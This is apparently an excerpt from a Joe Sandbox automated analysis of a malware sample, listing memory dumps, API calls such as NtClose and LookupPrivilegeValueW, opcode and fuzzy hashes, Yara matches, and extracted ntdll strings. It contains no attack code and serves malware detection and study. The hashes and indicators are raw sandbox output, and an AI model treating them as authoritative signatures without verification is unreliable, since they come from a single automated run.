                                                                                                                                                                                                        • Opcode ID: a92b911e27f53ecf696d4d7a5ba2ab7028a837a26c91bb7b4133aea6172ab6b5
                                                                                                                                                                                                        • Instruction ID: 0318eddddf4dd3894c10c50b6b89b1645946d9807308f0d60e58d7719e790871
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a92b911e27f53ecf696d4d7a5ba2ab7028a837a26c91bb7b4133aea6172ab6b5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36E026362002046FC710DFE4DC45EE73768EF48310F14415AB91D87241C130E5118B90
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
APIs
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 63c398d760d03ade3b4e9e392ea36dc8ab08953614019bba3ff2f91acba65b3f
• Instruction ID: 1fde31b2f8de285707022576c838fe67d07914005b5ca3a583614d83b2f67d5c
• Opcode Fuzzy Hash: 63c398d760d03ade3b4e9e392ea36dc8ab08953614019bba3ff2f91acba65b3f
• Instruction Fuzzy Hash: E6900225211000130645A55917045070046D7D6352351C426F6009550CD63189656121
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 7cf5f150bd69d21dc2a2455324aa0d553cd8a7aeb2dd010c21ae0c1bdc80f712
                                                                                                                                                                                                        • Instruction ID: 3e478366c2a3ebe4f9c14447ae568926274bb31d1b32444f1992ba776d397009
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7cf5f150bd69d21dc2a2455324aa0d553cd8a7aeb2dd010c21ae0c1bdc80f712
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D90023120108812D6506159950474A0005D7D1302F55C816A9418658DC6A589957121
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 6cdd02ade56b261c3edea995fa60842bc9a69c67055cadd871ee26476bad8857
                                                                                                                                                                                                        • Instruction ID: 748d8a03f8ff5693b449eca1bc6236d064cfe7ebcd9b406aeaa6c1dc2d8007af
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cdd02ade56b261c3edea995fa60842bc9a69c67055cadd871ee26476bad8857
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6590023120100412D640659965086460005D7E1302F51D416AA018555EC67589957131
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 37791f41518c4e4a3598d573d8b5a2666ec2e926b6c5a602a422995961618fe2
                                                                                                                                                                                                        • Instruction ID: cf2e449eaa1d87c13aeb00c1d2afe769851e5a15bbc368588d83274e84b1552a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37791f41518c4e4a3598d573d8b5a2666ec2e926b6c5a602a422995961618fe2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A90023120100812D6C07159550464A0005D7D2302F91C41AA5019654DCA258B5D77A1
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: c54c0ffa729fae6764676a0b3e7d35b7cbab6d6fa20ee7ea3a551d858f3c4594
                                                                                                                                                                                                        • Instruction ID: 9f8d81609e648d66672c021a5e1af21655f90e6638b7fbe2b5938f07397fd223
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c54c0ffa729fae6764676a0b3e7d35b7cbab6d6fa20ee7ea3a551d858f3c4594
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0890026120200013464571595514616400AD7E1302B51C426E6008590DC53589957125
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a5e06f581813ebfb4ca08d5691dfc4567ced6fe8c9c6a2cc2a746fa65b28d9ef
                                                                                                                                                                                                        • Instruction ID: e3f26242c5e00e0c71e328e5ffeb660fca19ce63f099b2582362ddc853d26e43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5e06f581813ebfb4ca08d5691dfc4567ced6fe8c9c6a2cc2a746fa65b28d9ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7090022160100512D64171595504616000AD7D1342F91C427A6018555ECA358A96B131
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 92eac56e424d6d041a21c8cb13a795a748d7337aab89cfd801d6ce1ae9ade658
                                                                                                                                                                                                        • Instruction ID: 86e2b21c147d77f51d8d122455caac1f9b48a985290090f07fae800cf60ac777
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92eac56e424d6d041a21c8cb13a795a748d7337aab89cfd801d6ce1ae9ade658
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C090027120100412D680715955047460005D7D1302F51C416AA058554EC6698ED97665
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: f55abce274392c1a088a3cabb20ec3e46307f94c4429aad0836073a495a76bdf
                                                                                                                                                                                                        • Instruction ID: 0ff7a656cd2a0c2d3287691c3afbee01a9b466108a011146a3092e857cc0d43f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f55abce274392c1a088a3cabb20ec3e46307f94c4429aad0836073a495a76bdf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA90023120100423D651615956047070009D7D1342F91C817A5418558DD6668A56B121
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a293c4dd15c4eb28854db4a80db9686a1ef9171c44c799a5da6c8654789869a4
                                                                                                                                                                                                        • Instruction ID: b62990706f359f4381ac5d21231d2bf6ee81348b26fa35aa5e4dd456407db45c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a293c4dd15c4eb28854db4a80db9686a1ef9171c44c799a5da6c8654789869a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8900221242041625A85B15955045074006E7E1342791C417A6408950CC536995AE621
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d2e96add3d858df0f656cdc0daf6e58b567570dc11f1e9356ccf5b213e93cb68
                                                                                                                                                                                                        • Instruction ID: 61a4eba3dac293c38f0c499204ccfca7cfcb276c4a026fceed8cf90124797346
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2e96add3d858df0f656cdc0daf6e58b567570dc11f1e9356ccf5b213e93cb68
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0090022921300012D6C07159650860A0005D7D2303F91D81AA5009558CC925896D6321
APIs
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Strings
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: U
• API String ID: 1836367815-3372436214

Control-flow Graph

Graph legend: Executed / Not Executed (rendered graph image not preserved)
Graph blocks: 18 41a630-41a661 call 41af60 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
Strings
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: 6EA
• API String ID: 1279760036-1400015478

Control-flow Graph

APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: ExitFreeHeapProcess
• String ID:
• API String ID: 1180424539-0

Control-flow Graph (graph rendering not reproduced)
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
• Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
• Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
• Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Control-flow Graph (graph rendering not reproduced)
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 8d1e3537532eb623d236a6a3546ff16b99b25c4043956dc1f6f05b88f1438d51
• Instruction ID: 52a58ecf24588938703af0cb6cc2dd2c37c65318c41e6f849e563e3d6c474d42
• Opcode Fuzzy Hash: 8d1e3537532eb623d236a6a3546ff16b99b25c4043956dc1f6f05b88f1438d51
• Instruction Fuzzy Hash: ACE0A9B62401046BC718CF75CC85EEB3B28EF89364F248149F90997282CA32E908CAA0

Control-flow Graph (graph rendering not reproduced)
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
• Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Control-flow Graph (graph rendering not reproduced)
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
• Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
• Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b003731d08c8e663f7dee0e5fd8a3c32939e936461c62b8490a59d0dd8916bbd
• Instruction ID: 57fb506d1e05276a6af5ba21d2b907921fc80907ee7fc63fa579bbccfd05eaa7
• Opcode Fuzzy Hash: b003731d08c8e663f7dee0e5fd8a3c32939e936461c62b8490a59d0dd8916bbd
• Instruction Fuzzy Hash: 77B02B318010C4C6DB01D72017087073900F7C0301F11C013E2024240FC738C190F231
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Critical section address, xrefs: 01875230, 018752C7, 0187533F
                                                                                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 0187534E
                                                                                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01875215, 018752A1, 01875324
                                                                                                                                                                                                        • undeleted critical section in freed memory, xrefs: 01875236
                                                                                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01875313
                                                                                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 018752C1
                                                                                                                                                                                                        • Address of the debug info found in the active list., xrefs: 018752B9, 01875305
                                                                                                                                                                                                        • 8, xrefs: 018750EE
                                                                                                                                                                                                        • Critical section debug info address, xrefs: 0187522A, 01875339
                                                                                                                                                                                                        • Critical section address., xrefs: 0187530D
                                                                                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018752D9
                                                                                                                                                                                                        • Thread identifier, xrefs: 01875345
                                                                                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018752ED
                                                                                                                                                                                                        • corrupted critical section, xrefs: 018752CD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
Strings
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 017FD263
• \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 017FD06F
• @, xrefs: 017FD2B3
• Control Panel\Desktop\LanguageConfiguration, xrefs: 017FD136
• Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 017FD202
• @, xrefs: 017FD24F
• @, xrefs: 017FD09D
• Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 017FD0E6
• String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
• String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
• String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
• String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 018597A0, 018597C9
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01859790
• LdrpInitShimEngine, xrefs: 01859783, 01859796, 018597BF
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0185977C
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018597B9
• apphelp.dll, xrefs: 017F6446
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01871F8A
                                                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01871F6F
                                                                                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01871F6A, 01871FA4, 01871FC4
                                                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01871FC9
                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01871F82
                                                                                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01871FA9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                                                                                        • Opcode ID: cafd808f44cb4f826ed11c15929ccbd8494f9e071a669b88c97618db8b1a6768
                                                                                                                                                                                                        • Instruction ID: 18cecd62e2a303fad11df38fc7aed86f591c2d238983dd67cfc8230cdcd594e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cafd808f44cb4f826ed11c15929ccbd8494f9e071a669b88c97618db8b1a6768
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B310A72B00215BBE7219A9A9C59F5BBAA9EFA5B54F084059FA01F7241D370EF00C7E1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0183C5E3
                                                                                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01877FF0
                                                                                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01877F82, 01877FF6
                                                                                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01877F7B
                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01877F8C, 01878000
                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 0183C5E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
